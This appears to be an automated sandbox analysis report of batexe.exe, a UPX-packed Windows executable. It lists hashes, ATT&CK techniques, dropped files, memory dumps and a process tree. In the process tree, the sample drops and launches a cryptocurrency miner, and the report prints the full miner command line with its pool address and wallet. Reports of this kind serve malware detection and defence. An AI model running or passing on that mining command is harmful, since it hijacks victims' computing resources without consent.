73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
302s
max time network
310s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
18/02/2024, 16:04

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
5748	b2e.exe
5708	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
5708	cpuminer-sse2.exe
5708	cpuminer-sse2.exe
5708	cpuminer-sse2.exe
5708	cpuminer-sse2.exe
5708	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/5420-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 5420 wrote to memory of 5748	5420	batexe.exe	81
PID 5420 wrote to memory of 5748	5420	batexe.exe	81
PID 5420 wrote to memory of 5748	5420	batexe.exe	81
PID 5748 wrote to memory of 2740	5748	b2e.exe	82
PID 5748 wrote to memory of 2740	5748	b2e.exe	82
PID 5748 wrote to memory of 2740	5748	b2e.exe	82
PID 2740 wrote to memory of 5708	2740	cmd.exe	85
PID 2740 wrote to memory of 5708	2740	cmd.exe	85

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5420
- C:\Users\Admin\AppData\Local\Temp\C6.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\C6.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\C6.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7FA.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2740
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5708

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7FA.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\C6.tmp\b2e.exe

Filesize
5.6MB

MD5
c276587b541315387cfd4ca84d11d84f

SHA1
b327bba7d67176cdb43016fddc5b5c24bf0fec74

SHA256
d20b4abc86e71e946ed8683ba0ceb0076f305f7e2be303c02f5311dad24cb00e

SHA512
94bb2507fc2391c7377ce92f2575efc08d078a9d45990f23c43b426031dfd95a1ed00fa412d56aa2dbc3319325605f640df6c6d71e8c94845b0f64d9cade94a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\C6.tmp\b2e.exe

Filesize
1.3MB

MD5
c58ff98e9f2086a13c54539ec3087577

SHA1
6b1c1b6a5b8bca936287e49ec48dcf20e06c1625

SHA256
e571ddcafa2b1f7b57517a49de4227982ed61f8948e31da2bc363cd4f06bfd5f

SHA512
9f2d67abfe8c625894c042db78a4ee3e79ef5f7f7c409faac5252fade355ca46a3ac42f4ac8395e2b04c72304da07f090e6188a163808d7db61c19e3afdae475

Download Submit
C:\Users\Admin\AppData\Local\Temp\C6.tmp\b2e.exe

Filesize
704KB

MD5
2bb8bf63c7d7958f71f9307c8635131f

SHA1
2362f18b011bd1e60fa078052821edefa33b8e08

SHA256
85151a35fd2a7ef587918c4702b2adbe0c3e7eed43bc8564a662ed03a6f3ce79

SHA512
59eba9edea2b2af76f261db76b15912b20070d75db7cf498d55a1bc13f11692d016c9a70ed447a784c874f6d11582112312f3d058443606eb4b6de349a4857ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
199KB

MD5
60cd6889be82f0d1ddc3614e1a5ac3fa

SHA1
4c37245a4e9e889fc5e84285a325795a68a019e4

SHA256
3ca281dd7d5d2a26d74cfda4937e60e8b3078bf965538a6818974be776250120

SHA512
0a98d1769b2d5239ccc9fec3f7aaa52c0c1c9323a5fcfdf8785dd4376d06e25d39020becf363407a7df670b920debe8aee19abf401ff7a2a4705281f1ae2e92e

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
339KB

MD5
7236d3417210640dfedd2c2444581992

SHA1
b3b947b03f5950ff0a9bb7bc2c49adc46a6ca844

SHA256
c65e7213c63ef192936fcd26d9d67adbfd61dd12cc1c3ec81d6787247a90a119

SHA512
9a7fefe471f9ba147d096255f777738a3e468d1b8028df1c8c59a3858d5600e261d96e228ea30310f176b2e40f14e4c73c5630a6059b3f85baa1ec96390d3983

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
249KB

MD5
8b64dd97d76b7de235142a2d2b52b041

SHA1
a02430ba165faf9c2483ca0037be0fbbb0d80ac7

SHA256
32525c5f531e69593bfeacba0719c2e2f12cd87c98de30d973409d4200cc4b86

SHA512
7a60dc6e82f9be1f984e9383d096c875f39c4218c74ecee3b22b56a6555453b7ea1016925e1ef254c590802e731d320fb2d622f07d8b2b6e7a4d63ff0aacc6ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
238KB

MD5
bca4b2234cf1d1306869d821d07e3e8a

SHA1
1152721c9e8378aaff971e1f694a52d27f544508

SHA256
eeb63beb3a0b8e0773f8c6ae8b6099f0411ee8b1b73ab2830d22d1d9e52e19b5

SHA512
7678049cb3d5071ec00fb4de1a5ea813707696bf7d5eff5b17e702b9ab8f065f6023f7b615fd509495a73a2680a17068752c321240f640274b29a32d09dd7aa3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
141KB

MD5
0867464bd75f5a0181652648080bf0b4

SHA1
8ac7f62a332a960a5f9c24d1b8c1481af86d4c23

SHA256
bc402341f356ebe2d6d85a5fedd8dbeb0838dc8d14166518987b9713716efae9

SHA512
ab8a96ae573a80d38440847c26ac5f422e92242771858ba1e15202f3e61d79fa84689afcad6d52b7afe6ba8822ef33d1b44d6f07c2373fa5b4e3eb84e2ca0aa4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
130KB

MD5
eeca70c45f74752d49c5adb6a623df42

SHA1
0ab59bc5271cc064ca28403d7d14f74f7766e5f1

SHA256
96f70b37caab5bd4481f4a8f1d4ecb7ea595775c91198e85bb94b46bcd27021f

SHA512
e57da993573df6a0f5eb5208700f2be877ac9fb926bb493f4da7b282c94de9bf4844070150427e8b73471425da99cc2714ebd6555499d96d405aa0986c4ea3fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
255KB

MD5
5fb569a86bc9f81eabe4d7700dff48d3

SHA1
5558a5e96ade0de321d628a65eabd3827d1555e3

SHA256
295dfe31f6ebc9f46745ad7688db7ddee59a83da65839413cc28d31ba767e29b

SHA512
5205c596bc20a9308c858b09b97307b1a6a6f756d578fb4f9c27142eab18e06927868c791003ebf285bdfb6de971e7d636f2f5baadb416947f188dece05c5dae

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
196KB

MD5
644f51751220cc26d1ad12e6335bcf7f

SHA1
9be408da4fbd8abe6e7abd794ea3d4bbc0409fa3

SHA256
dc288077143d14868bec5e0ad9ee773756f81d3cfa3e085321d66adb26e81e55

SHA512
893c05192d1ec737309994a40468c268b4d2397fe9a77cfde76b0ccfd68fbb426b1465d273aeadd49bceb3b6a8c16edae3324303598d93f17075c23b33948048

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
96KB

MD5
89b28192774f157a3b101635e6e26f42

SHA1
a9a205c39a87812a15ce57f9b419b4c29fa5679b

SHA256
76fa2d8f5fd2346b1a5373a48c8214e87f71d02aa3d2ec7adaaff33f8e4ae3a1

SHA512
3fdbe206d128338eab7c67f0f7a5d953e71cd3c3504fc8dd2bd038099397ae6d12be7af94d44aeacb664365ede4bd7298465d6f9812f6c4de37bc81f1c019eab

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
154KB

MD5
76a48d4521ea48a654fbfda33bbf94d2

SHA1
9642ea9c6a9653caa65bb9b5ae0f0f3f72310392

SHA256
ca2c5fb6ffc1fc27745cc2d32a0a54b1b689e0773548c1b9c5c2ed799469617a

SHA512
7ea80b09251bea3609d798602808a089c6d79dbdb2c6ed256aa29e787042847e1744234f552d6d5f1b67f66daa19b8c64871dc2b2bac0bb9945696dc363a5a09

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
84KB

MD5
105bac33ec2b34e085b1b4dd8da6b9cf

SHA1
3fc401bb85276d523b166865c52189e6eadcaa9e

SHA256
5c5edff493c64e57589a169b1b4e2a41d058bdc06340a656c1a910cb99d99b22

SHA512
f138a0953f6afb4bde5fd167d90d3ca39b89f1af0eb015800ba1406abcc2d30e1ca7791708e1af3032513fea3cbf746e4e6c287d8a4e1a27f8179512acc14d86

Download Submit
memory/5420-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/5708-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5708-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5708-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/5708-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/5708-46-0x00000000635D0000-0x0000000063668000-memory.dmp

Filesize
608KB

Download
memory/5708-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/5708-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5708-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5708-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5708-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5708-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5708-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5708-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5748-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5748-58-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download